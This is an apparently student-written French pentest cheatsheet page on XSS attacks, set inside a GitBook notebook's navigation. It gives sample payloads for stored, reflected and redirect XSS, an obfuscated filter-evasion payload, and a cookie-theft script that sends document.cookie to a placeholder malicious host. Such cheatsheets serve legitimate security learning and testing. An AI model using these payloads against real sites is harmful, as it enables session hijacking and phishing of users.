Cybersec Student
  • ⌚Kalix's Notebook
  • Méthodologie
  • Enumeration
    • Utilisation de nmap
    • SSH
    • HTTP
    • FTP
    • SMB
    • SMTP
    • SQL
    • Liste des ports communs
  • Scan de Vulnérabilités
    • Nessus
    • Nmap Script Engine
    • Scan de vulnerabilites avec Metasploit
    • Banner grabbing avec netcat
  • Exploitation
    • Bind Shell
    • Reverse Shell
    • Obfuscation de script Powershell
    • Compilation cross platform d'exploit
    • Evasion d'AV avec Shellter
    • Recherche d'exploits public
    • Exploitations communes
  • Post-Exploitation
    • Windows
      • Post Exploitation Windows Enumération
      • Abus de Configurations Incorrectes de Services Cheatsheet
      • Abus de logiciels vulnerables Cheatsheet
      • Abus de Privileges dangereux Cheatsheet
      • Strategie AlwaysInstallElevated
      • Extractions de Mots de Passe aux Emplacements Habituels Cheatsheet
      • Taches Planifiees Cheatsheet
      • Extractions et cracking Windows
      • Persistence Windows
    • Linux
      • Post Exploitation Linux Enumeration
      • SUID
      • SUDO
      • PATH
      • NFS
      • Kernel Exploits
      • Cron Jobs
      • Capabilities
      • Persistence Linux
      • Extractions et cracking Linux
    • Pivotage
    • Transfert de fichier
    • Upgrade de Shell
  • Pentest d'application web
    • Scan d'application web Nikto
    • Enumeration de dossiers et fichiers
    • Attaques XSS
    • Injections SQL
    • HTTP login avec Hydra
    • Login avec Burp
  • Outils
    • Liste exhaustive d'outils pour le pentest
    • Masscan
    • DNSenum
    • theHarvester
    • SQLMap
    • XSSer
    • WPscan
    • Netcat
    • Mimikatz
    • Cadaver
    • Windows Exploit Suggester
    • Linux Exploit Suggester
    • LinEnum
    • Shred
    • John
    • Hashcat
    • Impacket
    • Burp Suite
    • Wireshark
    • Autorecon
    • Evil-WinRM
    • CrackMapExec
    • MSFVenom
    • Joomscan
    • Binwalk
    • Steghide
  • OSINT
    • Recherches avancees Google
  • Scripting
    • Basic Powershell
  • Cryptographie
    • GPG
  • Cheatsheet ingénierie sociale
    • Gophish
  • Cheatsheet Réseaux
  • 🖤README.md
  • ⚠️Rapports de CTF
Powered by GitBook
On this page
  1. Pentest d'application web

Attaques XSS

Attaques XSS (Cross-Site Scripting) - Cheatsheet

  1. Identification de Vulnérabilités :

    • Testez les champs d'entrée, les formulaires, les paramètres d'URL et les zones de commentaires pour identifier les points d'injection XSS possibles.

    • Recherchez les messages d'erreur ou les filtrages de caractères qui pourraient indiquer une vulnérabilité.

  2. Injection XSS Persistante (Stockée) :

    • Injectez du code malveillant qui sera sauvegardé sur le serveur et affectera tous les utilisateurs qui afficheront la page.

    • Exemple : <script>alert('XSS attaque !');</script>

  3. Injection XSS Réfléchie (Non Persistante) :

    • Injectez du code malveillant qui sera exécuté uniquement lorsque l'utilisateur clique sur un lien ou visite une URL spécialement conçue.

    • Exemple : <img src="x" onerror="alert('XSS attaque !')">

  4. Redirection de Page et Hameçonnage :

    • Utilisez l'injection XSS pour rediriger les utilisateurs vers des sites malveillants ou pour voler leurs informations de connexion.

    • Exemple : <script>window.location.href = 'http://site-malveillant.com';</script>

  5. Vol de Cookies et Sessions :

    • Utilisez l'injection XSS pour voler les cookies de session des utilisateurs et usurper leurs identités.

    • Exemple : <script>document.location='http://site-malveillant.com/steal.php?cookie='+document.cookie;</script>

  6. Utilisation de Payloads Furtifs :

    • Utilisez des techniques d'obfuscation pour masquer le code malveillant et éviter la détection.

    • Exemple : <s%63ript>alert('XSS attaque !');</s%63ript>

PreviousEnumeration de dossiers et fichiersNextInjections SQL

Last updated 1 year ago